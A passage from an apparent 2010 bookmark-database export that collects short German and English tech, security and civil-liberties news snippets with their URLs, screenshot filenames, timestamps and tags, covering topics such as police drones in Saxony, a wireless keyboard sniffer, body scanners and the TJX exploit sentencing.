Bedienung des komplizierten Fluggeräts – Abstürze und Zusammenstöße inklusive. Ans Aufgeben denkt der Freistaat trotzdem nicht, im Gegenteil. Mit dem Verweis, dass die bisher getestete Drohne zu leicht sei, wurde im vergangenen Jahr mit der MD 4-1000 ein schwereres Nachfolgemodell angeschafft. Für das werden seitdem jeden Monat 2380 Euro Leasinggebühren fällig. Aber auch hier sind die Ergebnisse eher mager. Auf Anfrage der SPD-Landtagsabgeordneten Sabine Friedel musste die Staatsregierung jetzt einräumen, dass die beiden bisher getesteten Flugdrohnen lediglich 18-mal eingesetzt worden sind – während eines Zeitraums von mehr als zwei Jahren. + +In ganzen zehn Fällen kamen die Drohnen letztlich bei Fußballspielen zum Einsatz. Dabei waren die Geräte eigens angeschafft worden, um der Polizei bei gewaltgefährdeten Sportereignissen eine bessere Übersicht zu verschaffen und so für mehr Sicherheit zu sorgen.<h1>Bisher ganze 18 Einsätze</h1> +<p>Der Grund: Statt für Erfolgsmeldungen sorgt das Projekt vielmehr für ständigen Ärger und Kritik. So dauerte es zunächst ein Vierteljahr, bis eine für zwölf Monate angemietete Flugdrohne erstmals unter Einsatzbedingungen aufsteigen konnte. Leihgebühren (76000 Euro) und die Anschaffung von Technik zur Auswertung der geplanten Luftaufnahmen (22000 Euro) hielten die Kosten dennoch extrem hoch. Später haderte man wiederum mit der Bedienung des komplizierten Fluggeräts – Abstürze und Zusammenstöße inklusive. Ans Aufgeben denkt der Freistaat trotzdem nicht, im Gegenteil. Mit dem Verweis, dass die bisher getestete Drohne zu leicht sei, wurde im vergangenen Jahr mit der MD 4-1000 ein schwereres Nachfolgemodell angeschafft. Für das werden seitdem jeden Monat 2380 Euro Leasinggebühren fällig. Aber auch hier sind die Ergebnisse eher mager. Auf Anfrage der SPD-Landtagsabgeordneten Sabine Friedel musste die Staatsregierung jetzt einräumen, dass die beiden bisher getesteten Flugdrohnen lediglich 18-mal eingesetzt worden sind – während eines Zeitraums von mehr als zwei Jahren. +</p> +<p>In ganzen zehn Fällen kamen die Drohnen letztlich bei Fußballspielen zum Einsatz. Dabei waren die Geräte eigens angeschafft worden, um der Polizei bei gewaltgefährdeten Sportereignissen eine bessere Übersicht zu verschaffen und so für mehr Sicherheit zu sorgen. +</p>http://www.sz-online.de/nachrichten/artikel.asp?id=2423801page_shots/2010/03/29/sachsische-zeitung-online-sachsen-sachsens-po.pngsachsische-zeitung-online-sachsen-sachsens-po11012010-03-29 12:46:512drohneKit attacks Microsoft keyboards (and a whole lot more) • The RegisterKeykeriki version 2 captures the entire data stream sent between wireless devices using a popular series of chips made by Norway-based Nordic Semiconductor. That includes the device addresses and the raw payload being sent between them. The open-source package was developed by researchers of Switzerland-based Dreamlab Technologies and includes complete software, firmware, and schematics for building the $100 sniffer. + +Keykeriki not only allows researchers or attackers to capture the entire layer 2 frames, it also allows them to send their own unauthorized payloads. That means devices that don't encrypt communications - or don't encrypt them properly - can be forced to cough up sensitive communications or be forced to execute rogue commands. +... +"Microsoft made it easy for us because they used their own proprietary crypto," Schroder said. "Xor is not a very proper way to secure data."<p>Keykeriki version 2 captures the entire data stream sent between wireless devices using a popular series of chips made by Norway-based Nordic Semiconductor. That includes the device addresses and the raw payload being sent between them. The open-source package was developed by researchers of Switzerland-based Dreamlab Technologies and includes complete software, firmware, and schematics for building the $100 sniffer. +</p> +<p>Keykeriki not only allows researchers or attackers to capture the entire layer 2 frames, it also allows them to send their own unauthorized payloads. That means devices that don't encrypt communications - or don't encrypt them properly - can be forced to cough up sensitive communications or be forced to execute rogue commands. + ... + "Microsoft made it easy for us because they used their own proprietary crypto," Schroder said. "Xor is not a very proper way to secure data." +</p>http://www.theregister.co.uk/2010/03/26/open_source_wireless_sniffer/page_shots/2010/03/29/kit-attacks-microsoft-keyboards-and-a-whole-lot-m_.pngkit-attacks-microsoft-keyboards-and-a-whole-lot-m11012010-03-29 10:08:182hardware sniffer8 Jahre Hausdurchsuchung dank DatenbankfehlerEmbarrassed cops on Thursday cited a "computer glitch" as the reason police targeted the home of an elderly, law-abiding couple more than 50 times in futile hunts for bad guys. Apparently, the address of Walter and Rose Martin's Brooklyn home was used to test a department-wide computer system in 2002. What followed was years of cops appearing at the Martins' door looking for murderers, robbers and rapists - as often as three times a week.<p>Embarrassed cops on Thursday cited a "computer glitch" as the reason police targeted the home of an elderly, law-abiding couple more than 50 times in futile hunts for bad guys. Apparently, the address of Walter and Rose Martin's Brooklyn home was used to test a department-wide computer system in 2002. What followed was years of cops appearing at the Martins' door looking for murderers, robbers and rapists - as often as three times a week. +</p>http://www.nydailynews.com/news/2010/03/19/2010-03-19_computer_snafu_behind_repeated_raids_on_bklyn_couples_home_the_8year_glitch.htmlpage_shots/2010/03/27/8-jahre-hausdurchsuchung-dank-datenbankfehler.png8-jahre-hausdurchsuchung-dank-datenbankfehler131012010-03-27 15:02:342datenbank fail fuckup sicherheit überwachungDer erste Flughafen-Security-Fuzzy ist beim Bodyscanner-Spannen erwischt wordenJo Margetson, 29, reported John Laker, 25, after he took her picture with the X-ray gadget and made a lewd comment. The pervy guard leered and told her: "I love those gigantic t**s." She had entered the X-ray machine by mistake - and was horrified when Laker pressed a button to take a revealing photo.<p>Jo Margetson, 29, reported John Laker, 25, after he took her picture with the X-ray gadget and made a lewd comment. The pervy guard leered and told her: "I love those gigantic t<em></em>s." She had entered the X-ray machine by mistake - and was horrified when Laker pressed a button to take a revealing photo. +</p>http://www.bigbrotherwatch.org.uk/home/2010/03/oh-the-irony.htmlpage_shots/2010/03/27/der-erste-flughafen-security-fuzzy-ist-beim-bodysc.pngder-erste-flughafen-security-fuzzy-ist-beim-bodysc131012010-03-27 14:59:042biometrie fail nacktscanner sicherheitSony accuses Beyonce of piracy for putting her videos on YouTubeSony Entertainment has shut down Beyonce's official YouTube site. Congrats to Sony Entertainment for wisely spending its legal dollars and working on behalf of its artists. Truly, you deserve many laws and secret treaties passed to protect your "business model" (how else could such a delicate flower survive the harsh realities of the real world?).<p>Sony Entertainment has shut down Beyonce's official YouTube site. Congrats to Sony Entertainment for wisely spending its legal dollars and working on behalf of its artists. Truly, you deserve many laws and secret treaties passed to protect your "business model" (how else could such a delicate flower survive the harsh realities of the real world?). +</p>http://www.motherboard.tv/2010/3/26/beyonce-s-record-company-puts-a-ring-on-her-youtube-channel--2page_shots/2010/03/27/sony-accuses-beyonce-of-piracy-for-putting-her-vid.pngsony-accuses-beyonce-of-piracy-for-putting-her-vid131012010-03-27 14:53:192acta, copyright, imaginary property, music, sony, youtubePiracy up in France after tough three-strikes law passedFrance's toughest-in-the-world Internet disconnection law has yet to start cutting off P2P pirates, but the "Hadopi" law has been on the books long enough to see how its provisions are altering behavior. According to a team of French researchers, online copyright infringement is down on P2P networks—but it's up in areas that the law doesn't cover, such as online streaming and one-click download services like Rapidshare. + +In fact, since the law was passed, total infringing behavior has actually increased by three percent.<p>France's toughest-in-the-world Internet disconnection law has yet to start cutting off P2P pirates, but the "Hadopi" law has been on the books long enough to see how its provisions are altering behavior. According to a team of French researchers, online copyright infringement is down on P2P networks—but it's up in areas that the law doesn't cover, such as online streaming and one-click download services like Rapidshare. +</p> +<p>In fact, since the law was passed, total infringing behavior has actually increased by three percent. +</p>http://arstechnica.com/tech-policy/news/2010/03/piracy-up-in-france-after-tough-three-strikes-law-passed.arspage_shots/2010/03/26/piracy-up-in-france-after-tough-three-strikes-law.pngpiracy-up-in-france-after-tough-three-strikes-law11012010-03-26 21:45:2423strikesheise online - EFF zweifelt an Abhörsicherheit von SSLSo habe man beispielsweise einen Navigationsgerätehersteller dazu gebracht, zum Mitschneiden der Gespräche in einem Fahrzeug das eingebaute Mikrofon zu aktivieren. VeriSign, der größte Anbieter von SSL-Zertifikaten, sei außerdem an Geschäften zum Outsourcing von Telekommunikationsüberwachung beteiligt.<p>So habe man beispielsweise einen Navigationsgerätehersteller dazu gebracht, zum Mitschneiden der Gespräche in einem Fahrzeug das eingebaute Mikrofon zu aktivieren. VeriSign, der größte Anbieter von SSL-Zertifikaten, sei außerdem an Geschäften zum Outsourcing von Telekommunikationsüberwachung beteiligt. +</p>http://www.heise.de/newsticker/meldung/EFF-zweifelt-an-Abhoersicherheit-von-SSL-963857.htmlpage_shots/2010/03/26/heise-online-eff-zweifelt-an-abhorsicherheit-von.pngheise-online-eff-zweifelt-an-abhorsicherheit-von11012010-03-26 10:21:102sslSpam kommt gut anDie MAAWG hat ihre Studie erstmals auf europäische Länder ausgeweitet und sieht die Vorjahresergebnisse aus den USA im Wesentlichen bestätigt. Nach den Erkenntnissen der Anti-Spam-Experten haben mehr als die Hälfte (57 %) der befragten Erwachsenen ausgesagt, bereits auf Spam in einer Weise reagiert zu haben, die dem Treiben der Täter Vorschub leistet. Dazu gehören neben dem Öffnen der E-Mail das Weiterleiten oder das Anklicken von URLs in den Spam-Mails. Fast die Hälfte dieser Gruppe (46 % und somit rund ein Viertel der Gesamtheit) tat dies in voller Absicht, also im Wissen, dass es sich nicht um ein seriöses Angebot handelte. + +Neben möglichem Fehlverhalten in der Vergangenheit fragte die MAAWG aktuelle Gewohnheiten der Mail-Adressaten ab, und auch die werfen kein gutes Licht auf die Anwenderschaft. Nur 60 Prozent gaben explizit an, anscheinend betrügerische E-Mails nicht zu öffnen, und jeder achte Empfänger (12 %) klickt darin trotz eines mulmigen Gefühls auf einen Link, der eine Austragung aus der Mailingliste verspricht.<p>Die MAAWG hat ihre Studie erstmals auf europäische Länder ausgeweitet und sieht die Vorjahresergebnisse aus den USA im Wesentlichen bestätigt. Nach den Erkenntnissen der Anti-Spam-Experten haben mehr als die Hälfte (57 %) der befragten Erwachsenen ausgesagt, bereits auf Spam in einer Weise reagiert zu haben, die dem Treiben der Täter Vorschub leistet. Dazu gehören neben dem Öffnen der E-Mail das Weiterleiten oder das Anklicken von URLs in den Spam-Mails. Fast die Hälfte dieser Gruppe (46 % und somit rund ein Viertel der Gesamtheit) tat dies in voller Absicht, also im Wissen, dass es sich nicht um ein seriöses Angebot handelte. +</p> +<p>Neben möglichem Fehlverhalten in der Vergangenheit fragte die MAAWG aktuelle Gewohnheiten der Mail-Adressaten ab, und auch die werfen kein gutes Licht auf die Anwenderschaft. Nur 60 Prozent gaben explizit an, anscheinend betrügerische E-Mails nicht zu öffnen, und jeder achte Empfänger (12 %) klickt darin trotz eines mulmigen Gefühls auf einen Link, der eine Austragung aus der Mailingliste verspricht. +</p>http://www.heise.de/newsticker/meldung/Spam-kommt-gut-an-963570.htmlpage_shots/2010/03/25/spam-kommt-gut-an.pngspam-kommt-gut-an11012010-03-25 14:26:452e-mail spamTJX Accomplice Gets Probation for Selling Browser Exploit | Threat Level | Wired.comA computer security professional who provided Internet Explorer exploit code that helped hackers penetrate TJX and other companies was sentenced Tuesday in Boston to three years probation and a $10,000 fine. + +Jeremy Jethro, 29, was paid $60,000 in cash by convicted TJX hacker Albert Gonzalez for a zero-day exploit against Microsoft’s browser, which Gonzalez and his co-conspirators used to obtain unauthorized access to company networks and steal more than 90 million credit and debit card numbers. + + + +Read More http://www.wired.com/threatlevel/2010/03/jethro-sentencing/#ixzz0j1fIgcLy<p>A computer security professional who provided Internet Explorer exploit code that helped hackers penetrate TJX and other companies was sentenced Tuesday in Boston to three years probation and a $10,000 fine. +</p> +<p>Jeremy Jethro, 29, was paid $60,000 in cash by convicted TJX hacker Albert Gonzalez for a zero-day exploit against Microsoft’s browser, which Gonzalez and his co-conspirators used to obtain unauthorized access to company networks and steal more than 90 million credit and debit card numbers. +</p> +<p>Read More http://www.wired.com/threatlevel/2010/03/jethro-sentencing/#ixzz0j1fIgcLy +</p>http://www.wired.com/threatlevel/2010/03/jethro-sentencing/page_shots/2010/03/23/tjx-accomplice-gets-probation-for-selling-browser.pngtjx-accomplice-gets-probation-for-selling-browser11012010-03-23 19:30:041aurora hackIsrael aborts raid after soldier posts details on Facebook + --Israeli Raid Called Off After Plan Details Posted on Facebook +(March 3 & 4, 2010) +A planned Israeli raid on a Palestinian village in the West Bank was +called off after a soldier posted information about it on Facebook. The +post included details about the time and location of the planned sweep +and the name of his combat unit. Other soldiers who saw the post +alerted their superiors. The soldier was sentenced to 10 days in prison +and has been relieved of combat duty. +<p> --Israeli Raid Called Off After Plan Details Posted on Facebook + (March 3 &amp; 4, 2010) + A planned Israeli raid on a Palestinian village in the West Bank was + called off after a soldier posted information about it on Facebook. The + post included details about the time and location of the planned sweep + and the name of his combat unit. Other soldiers who saw the post + alerted their superiors. The soldier was sentenced to 10 days in prison + and has been relieved of combat duty. +</p>http://www.smh.com.au/technology/technology-news/israel-aborts-raid-after-soldier-posts-details-on-facebook-20100304-pjfb.htmlpage_shots/2010/03/23/israel-aborts-raid-after-soldier-posts-details-on.pngisrael-aborts-raid-after-soldier-posts-details-on11012010-03-23 15:44:181facebookCybercrime losses almost double • The Register --FBI: Cost of Reported Cybercrime in 2009 Was US $560 Million +(March 12 & 15, 2010) +According to statistics from the FBI's Internet Crime Complaint Center +(IC3), the financial cost of cyber crime reported in the US more than +doubled between 2008 and 2009, totaling nearly US $560 million in 2009. +Among the most frequently reported attacks were phishing schemes that +purported to come from the FBI itself. The total number of cybercrime +complaints rose 22.9 percent from 257,284 submissions in 2008 to 336,655 +submissions in 2009. Other often-reported schemes involved non-delivery +of Internet-purchased merchandise or payments for Internet purchases, +and phony anti-virus software. +<p> --FBI: Cost of Reported Cybercrime in 2009 Was US $560 Million + (March 12 &amp; 15, 2010) + According to statistics from the FBI's Internet Crime Complaint Center + (IC3), the financial cost of cyber crime reported in the US more than + doubled between 2008 and 2009, totaling nearly US $560 million in 2009. + Among the most frequently reported attacks were phishing schemes that + purported to come from the FBI itself. The total number of cybercrime + complaints rose 22.9 percent from 257,284 submissions in 2008 to 336,655 + submissions in 2009. Other often-reported schemes involved non-delivery + of Internet-purchased merchandise or payments for Internet purchases, + and phony anti-virus software. +</p>http://www.theregister.co.uk/2010/03/15/cybercrime_complaint_surge/page_shots/2010/03/23/cybercrime-losses-almost-double-the-register.pngcybercrime-losses-almost-double-the-register11012010-03-23 15:33:361 Update: Security industry faces attacks it cannot stop --Six of Seven AV Programs Tested Did Not Detect Aurora Attack Variants +(March 11, 2010) +A test of seven of commonly used anti-virus programs found that just one +detected variants of the malware that exploited the IE vulnerability +used in the Aurora attacks, which affected Google, Adobe and other US +companies. Rick Moy, president of NSS Labs, the company that performed +the tests, said that "vendors need to put more focus on the +vulnerability than on exploit protection." Threat detection and +mitigation need to evolve to meet the challenge of the emerging attacks. +OS and client software vendors need to shoulder their share of the +security burden. +<p> --Six of Seven AV Programs Tested Did Not Detect Aurora Attack Variants + (March 11, 2010) + A test of seven of commonly used anti-virus programs found that just one + detected variants of the malware that exploited the IE vulnerability + used in the Aurora attacks, which affected Google, Adobe and other US + companies. Rick Moy, president of NSS Labs, the company that performed + the tests, said that "vendors need to put more focus on the + vulnerability than on exploit protection." Threat detection and + mitigation need to evolve to meet the challenge of the emerging attacks. + OS and client software vendors need to shoulder their share of the + security burden. +</p>http://www.computerworld.com/s/article/9169658/Update_Security_industry_faces_attacks_it_cannot_stop?taxonomyId=13&pagpage_shots/2010/03/23/update-security-industry-faces-attacks-it-cannot.pngupdate-security-industry-faces-attacks-it-cannot11012010-03-23 15:31:361aurora avEvery citizen to have personal webpage - TelegraphEveryone in the country is to be given a personalised webpage for accessing Government services within a year as part of a plan to save billions of pounds by putting all public services online, Gordon Brown is to announce. + +Brown findet Broadband Inet Access auch so wichtig wie die Stromversorgung<p>Everyone in the country is to be given a personalised webpage for accessing Government services within a year as part of a plan to save billions of pounds by putting all public services online, Gordon Brown is to announce. +</p> +<p>Brown findet Broadband Inet Access auch so wichtig wie die Stromversorgung +</p>http://www.telegraph.co.uk/technology/news/7484600/Every-citizen-to-have-personal-webpage.htmlpage_shots/2010/03/23/every-citizen-to-have-personal-webpage-telegraph.pngevery-citizen-to-have-personal-webpage-telegraph11012010-03-23 15:07:051uk + 1968 ASCII Animation from Russia It’s a bit of experimental computer animation of a cat done in Russia in 1968. The scientists who made it created hundreds of ASCII art images of the kitty, then printed them out and filmed them pose by pose.<p> It’s a bit of experimental computer animation of a cat done in Russia in 1968. The scientists who made it created hundreds of ASCII art images of the kitty, then printed them out and filmed them pose by pose. +</p>http://technologizer.com/2010/03/21/1968-ascii-animation-from-russia/page_shots/2010/03/23/1968-ascii-animation-from-russia.png1968-ascii-animation-from-russia11012010-03-23 15:04:361asciiartSlashdot IT Story | The Biggest Cloud Providers Are Botnets"Google is made up of 500,000 systems, 1 million CPUs and 1,500 gigabits per second (Gbps) of bandwidth, according to cloud service provider Neustar. Amazon comes in second with 160,000 systems, 320,000 CPUs and 400 Gbps of bandwidth, while Rackspace offers 65,000 systems, 130,000 CPUs and 300 Gbps. But these clouds are dwarfed by the likes of the really big cloud services, otherwise known as botnets. Conficker controls 6.4 million computer systems in 230 countries, with more than 18 million CPUs and 28 terabits per second of bandwidth."<p>"Google is made up of 500,000 systems, 1 million CPUs and 1,500 gigabits per second (Gbps) of bandwidth, according to cloud service provider Neustar. Amazon comes in second with 160,000 systems, 320,000 CPUs and 400 Gbps of bandwidth, while Rackspace offers 65,000 systems, 130,000 CPUs and 300 Gbps. But these clouds are dwarfed by the likes of the really big cloud services, otherwise known as botnets. Conficker controls 6.4 million computer systems in 230 countries, with more than 18 million CPUs and 28 terabits per second of bandwidth." +</p>http://it.slashdot.org/story/10/03/23/1226241/The-Biggest-Cloud-Providers-Are-Botnetspage_shots/2010/03/23/slashdot-it-story-the-biggest-cloud-providers-ar.pngslashdot-it-story-the-biggest-cloud-providers-ar11012010-03-23 14:58:001bigheise online - Mehr als 20.000 Mitbeschwerden gegen ELENAIn der ersten Woche nach dem Start der [Website](https://petition.foebud.org/ELENA) für eine Mitmach-Verfassungsbeschwerde gegen die zentrale Erfassung von elektronischen Entgeltnachweisen (ELENA) haben dort bereits über 20.000 Mitbeschwerdeführende Vollmachten abgegeben. Das teilt der FoeBuD (Verein zur Förderung des öffentlichen bewegten und unbewegten Datenverkehrs) am heutigen Montag mit. Er hat die Aktion zusammen mit weiteren Datenschutzorganisationen initiiert.<p>In der ersten Woche nach dem Start der <a href="https://petition.foebud.org/ELENA">Website</a> für eine Mitmach-Verfassungsbeschwerde gegen die zentrale Erfassung von elektronischen Entgeltnachweisen (ELENA) haben dort bereits über 20.000 Mitbeschwerdeführende Vollmachten abgegeben. Das teilt der FoeBuD (Verein zur Förderung des öffentlichen bewegten und unbewegten Datenverkehrs) am heutigen Montag mit. Er hat die Aktion zusammen mit weiteren Datenschutzorganisationen initiiert. +</p>http://www.heise.de/newsticker/meldung/Mehr-als-20-000-Mitbeschwerden-gegen-ELENA-960122.htmlpage_shots/2010/03/23/heise-online-mehr-als-20000-mitbeschwerden-gege.pngheise-online-mehr-als-20000-mitbeschwerden-gege11012010-03-23 14:52:231elenaheise online - Firefox 3.6.2 schließt schwerwiegende SicherheitslückeBekannt wurde die Sicherheitslücke, als der russische Sicherheitsdienstleister Intevydis seinen Kunden einen Windows-Exploit dafür zur Verfügung stellte. Intevydis verhält sich gegenüber Herstellern, in deren Produkten sie Sicherheitslücken entdecken, wenig auskunftsfreudig, und verkauft sein Wissen. Der Entdecker Evgeny Legerov hatte mit seinem Fund zunächst angegeben, ohne Details zu nennen, später aber die Mozilla-Entwickler kontaktiert.<p>Bekannt wurde die Sicherheitslücke, als der russische Sicherheitsdienstleister Intevydis seinen Kunden einen Windows-Exploit dafür zur Verfügung stellte. Intevydis verhält sich gegenüber Herstellern, in deren Produkten sie Sicherheitslücken entdecken, wenig auskunftsfreudig, und verkauft sein Wissen. Der Entdecker Evgeny Legerov hatte mit seinem Fund zunächst angegeben, ohne Details zu nennen, später aber die Mozilla-Entwickler kontaktiert. +</p>http://www.heise.de/newsticker/meldung/Firefox-3-6-2-schliesst-schwerwiegende-Sicherheitsluecke-961024.htmlpage_shots/2010/03/23/heise-online-firefox-362-schliet-schwerwiegen.pngheise-online-firefox-362-schliet-schwerwiegen11012010-03-23 14:48:351firefox vulnerabilityNottingham cops declare war on kids - Boing BoingPolice in Nottingham, England declared war on youth on Saturday night: anyone between 13-24 getting off a bus into town was sent through a metal-detector, and the streets were swarmed with drug-dogs that were set on young people. + +Over 1,000 English cities and towns have a curfew for young people, giving police (and fake "citizen cops") the power to send kids home after dark for any reason, if, in their judgement, the kids are apt to be disturbing "real" people.<p>Police in Nottingham, England declared war on youth on Saturday night: anyone between 13-24 getting off a bus into town was sent through a metal-detector, and the streets were swarmed with drug-dogs that were set on young people. +</p> +<p>Over 1,000 English cities and towns have a curfew for young people, giving police (and fake "citizen cops") the power to send kids home after dark for any reason, if, in their judgement, the kids are apt to be disturbing "real" people. +</p>http://www.boingboing.net/2010/03/21/nottingham-cops-decl.htmlpage_shots/2010/03/23/nottingham-cops-declare-war-on-kids-boing-boing.pngnottingham-cops-declare-war-on-kids-boing-boing11012010-03-23 14:41:151ukEmpörte Pakistaner: Freundschaftsreise in die USA endet mit Nacktscanner-Eklat - SPIEGEL ONLINE - Nachrichten - PolitikEine Delegation pakistanischer Politiker sollte in den USA den neuen Geist der vertieften Partnerschaft beider Länder kennenlernen - doch die Reise nach Washington wurde zum Fiasko. Die Gäste sollten am Flughafen körpergescannt werden. Sie verweigerten sich empört. Und werden nun als Helden gefeiert. + +Hamburg - Der Reiseplan war fein ausgearbeitet. Sechs pakistanische Politiker sollten sich in den USA davon überzeugen, wie sehr die Amerikaner an einer verstärkten Zusammenarbeit mit ihrem Heimatland interessiert sind. Treffen mit Obamas Spitzenberatern standen auf dem Programm, ein Besuch im Pentagon, einer im Nationalen Sicherheitsrat. Dazu eine Unkostenpauschale von 200 Dollar pro Tag und Person. Die Gastgeber in Washington hatten sich Mühe gegeben.<p>Eine Delegation pakistanischer Politiker sollte in den USA den neuen Geist der vertieften Partnerschaft beider Länder kennenlernen - doch die Reise nach Washington wurde zum Fiasko. Die Gäste sollten am Flughafen körpergescannt werden. Sie verweigerten sich empört. Und werden nun als Helden gefeiert. +</p> +<p>Hamburg - Der Reiseplan war fein ausgearbeitet. Sechs pakistanische Politiker sollten sich in den USA davon überzeugen, wie sehr die Amerikaner an einer verstärkten Zusammenarbeit mit ihrem Heimatland interessiert sind. Treffen mit Obamas Spitzenberatern standen auf dem Programm, ein Besuch im Pentagon, einer im Nationalen Sicherheitsrat. Dazu eine Unkostenpauschale von 200 Dollar pro Tag und Person. Die Gastgeber in Washington hatten sich Mühe gegeben. +</p>http://www.spiegel.de/politik/ausland/0,1518,682771,00.htmlpage_shots/2010/03/23/emporte-pakistaner-freundschaftsreise-in-die-usa.pngemporte-pakistaner-freundschaftsreise-in-die-usa11012010-03-23 14:37:231nacktscannerFormer TSA analyst charged with computer tampering - TSA, terrorism, tampering, analyst - Good Gear GuideA U.S. Transport Security Administration analyst has been indicted with tampering with databases used by the TSA to identify possible terrorists who may be trying to fly in the U.S.<p>A U.S. Transport Security Administration analyst has been indicted with tampering with databases used by the TSA to identify possible terrorists who may be trying to fly in the U.S. +</p>http://www.goodgearguide.com.au/article/339185/former_tsa_analyst_charged_computer_tampering/page_shots/2010/03/23/no_page_shot.pngformer-tsa-analyst-charged-with-computer-tampering11012010-03-23 14:35:461crime + Energizer battery charger contains backdoor | Zero Day + | ZDNet.com + The United States Computer Emergency Response Team (US-CERT) has warned that the software included in the Energizer DUO USB battery charger contains a backdoor that allows unauthorized remote system access. + + +In an [advisory](http://www.kb.cert.org/vuls/id/154421), the US-CERT warned that he installer for the Energizer DUO software places the file UsbCharger.dll in the application’s directory and Arucer.dll in the Windows system32 directory.<p>The United States Computer Emergency Response Team (US-CERT) has warned that the software included in the Energizer DUO USB battery charger contains a backdoor that allows unauthorized remote system access. +</p> +<p>In an <a href="http://www.kb.cert.org/vuls/id/154421">advisory</a>, the US-CERT warned that he installer for the Energizer DUO software places the file UsbCharger.dll in the application’s directory and Arucer.dll in the Windows system32 directory. +</p>http://blogs.zdnet.com/security/?p=5602&tag=wrapper;col1page_shots/2010/03/23/energizer-battery-charger-contains-backdoor.pngenergizer-battery-charger-contains-backdoor11012010-03-23 14:33:081hardware malwareA Tool to Deceive and Slaughterhttp://cgi.ebay.com/A-Tool-to-Deceive-and-Slaughter-2009-Caleb-Larsen_W0QQitemZ110508211602QQihZ001QQcategoryZ60442QQcmdZViewItemQQ_trksidZp4340.m444QQ_trkparmsZalgo%3DCRX%26its%3DC%252BS%26itu%3DSI%252BUA%252BLM%252BLA%26otn%3D1%page_shots/2010/03/23/a-tool-to-deceive-and-slaughter.pnga-tool-to-deceive-and-slaughter11012010-03-23 14:28:191hack hardwareheise online - SCO vs. Linux: Die Jury ist aufgeklärt* Never ending story +* Verhandlung über Copyright neu, da von Geschworenen beurteilt werden muss. + +> Die Autoren des HP-Memorandums waren der Meinung, dass der Kauf einer Lizenz ähnlich zu bewerten sei wie die Unterstützung von Terroristen durch Geldzahlungen.<ul> + <li> + Never ending story + </li> + + <li> + Verhandlung über Copyright neu, da von Geschworenen beurteilt werden muss. + </li> +</ul> +<blockquote><p>Die Autoren des HP-Memorandums waren der Meinung, dass der Kauf einer Lizenz ähnlich zu bewerten sei wie die Unterstützung von Terroristen durch Geldzahlungen. +</p> +</blockquote>http://www.heise.de/newsticker/meldung/SCO-vs-Linux-Die-Jury-ist-aufgeklaert-959328.htmlpage_shots/2010/03/20/heise-online-sco-vs-linux-die-jury-ist-aufgekl.pngheise-online-sco-vs-linux-die-jury-ist-aufgekl11012010-03-20 12:38:331novell scoff flaw and browser rounduphttp://www.theregister.co.uk/2010/03/19/firefox_chrome_security_updates/page_shots/2010/03/20/ff-flaw-and-browser-roundup.pngff-flaw-and-browser-roundup11012010-03-20 00:08:131browser vulnerabilityGoogle about to pull the plug in ChinaGoogle will am 10. April google.cn abschalten. Sonst machen sie weiter... Spannend.<p>Google will am 10. April google.cn abschalten. Sonst machen sie weiter... Spannend. +</p>http://www.heise.de/newsticker/meldung/Bericht-Google-macht-chinesische-Suchmaschine-im-April-dicht-959551.htmlpage_shots/2010/03/19/google-about-to-pull-the-plug-in-china.pnggoogle-about-to-pull-the-plug-in-china11012010-03-19 17:32:451china googlePetition: Franziska Heine BriefmarkeFranziska Heine, die Initiatorin der erfolgreichsten Bundestagspetition aller Zeiten, bekommt für ihren herausragenden Einsatz für die Meinungs-, Informations- und Pressefreiheit von der Deutschen Post eine eigene Briefmarke. + +Wenn du es willst! + +Die Post hat eine Umfrage gestartet, welcher Persönlichkeit eine eigene Briefmarke gewidmet werden soll. Ich bin der Meinung, dass sich Franziska diese Ehre mehr als verdient hat. Um an der Umfrage teilzunehmen und für Franziska zu stimmen, müsst ihr lediglich dieses [Formular](https://docs.google.com/fileview?id=0B5MlxeeHZ0xbYmEzYWVjZmQtZWFiMi00NDRkLWFmZmEtMzIxZjViZDdmNDY1&hl=en) herunterladen (PDF), ausdrucken, euren Namen und eure Postanschrift in das Adressfeld eintragen und mit Datum unterschreiben. Dann entweder unfrei (keine Briefmarke nötig!) an folgende Adresse schicken: + +Deutsche Post AG +Niederlassung Philatelie +Abteilung 6956 vpwe +Postfach 11 14 +92623 Weiden + +Oder per Fax an: 01803 / 24 68 69 (9 Cent pro Minute)<p>Franziska Heine, die Initiatorin der erfolgreichsten Bundestagspetition aller Zeiten, bekommt für ihren herausragenden Einsatz für die Meinungs-, Informations- und Pressefreiheit von der Deutschen Post eine eigene Briefmarke. +</p> +<p>Wenn du es willst! +</p> +<p>Die Post hat eine Umfrage gestartet, welcher Persönlichkeit eine eigene Briefmarke gewidmet werden soll. Ich bin der Meinung, dass sich Franziska diese Ehre mehr als verdient hat. Um an der Umfrage teilzunehmen und für Franziska zu stimmen, müsst ihr lediglich dieses <a href="https://docs.google.com/fileview?id=0B5MlxeeHZ0xbYmEzYWVjZmQtZWFiMi00NDRkLWFmZmEtMzIxZjViZDdmNDY1&amp;hl=en">Formular</a> herunterladen (PDF), ausdrucken, euren Namen und eure Postanschrift in das Adressfeld eintragen und mit Datum unterschreiben. Dann entweder unfrei (keine Briefmarke nötig!) an folgende Adresse schicken: +</p> +<p>Deutsche Post AG + Niederlassung Philatelie + Abteilung 6956 vpwe + Postfach 11 14 + 92623 Weiden +</p> +<p>Oder per Fax an: 01803 / 24 68 69 (9 Cent pro Minute) +</p>http://wii1and.blogspot.com/2010/03/franziska-heine-bekommt-eigene.html?spref=twpage_shots/2010/03/19/petition-franziska-heine-briefmarke.pngpetition-franziska-heine-briefmarke11012010-03-19 15:37:471censorshipHackable Linux clamshell goes on sale for $99http://www.linuxfordevices.com/c/a/News/Qi-Hardware-Ben-NanoNote/page_shots/2010/03/19/no_page_shot.pnghackable-linux-clamshell-goes-on-sale-for-9911012010-03-19 15:01:091hardwareBoni für KK-ManagerDas übliche, schöne Boni für Manager....<p>Das übliche, schöne Boni für Manager.... +</p>http://www.1a-krankenversicherung.org/nachrichten/20100310/7440/trotz-zusatzbeitrag-boni-von-ueber-50-000-euro/page_shots/2010/03/19/boni-fur-kk-manager.pngboni-fur-kk-manager61012010-03-19 13:16:111boni managerApple will not replace ipad batteries - The Inquirerhttp://www.theinquirer.net/inquirer/news/1596392/apple-replace-ipad-batteriespage_shots/2010/03/19/apple-will-not-replace-ipa.pngapple-will-not-replace-ipa11012010-03-18 23:21:031apple ipadPetition gegen ELENA vom Foebudhttps://petition.foebud.org/ELENApage_shots/2010/03/18/petition-gegen-elena-vom-foebud.pngpetition-gegen-elena-vom-foebud11012010-03-18 20:56:471petitioneBook reading applicationfile sharing build in, many cool features, <p>file sharing build in, many cool features, +</p>http://calibre-ebook.com/page_shots/2010/03/18/ebook-reading-application.pngebook-reading-application11012010-03-18 17:24:211ebookApple's patent attack 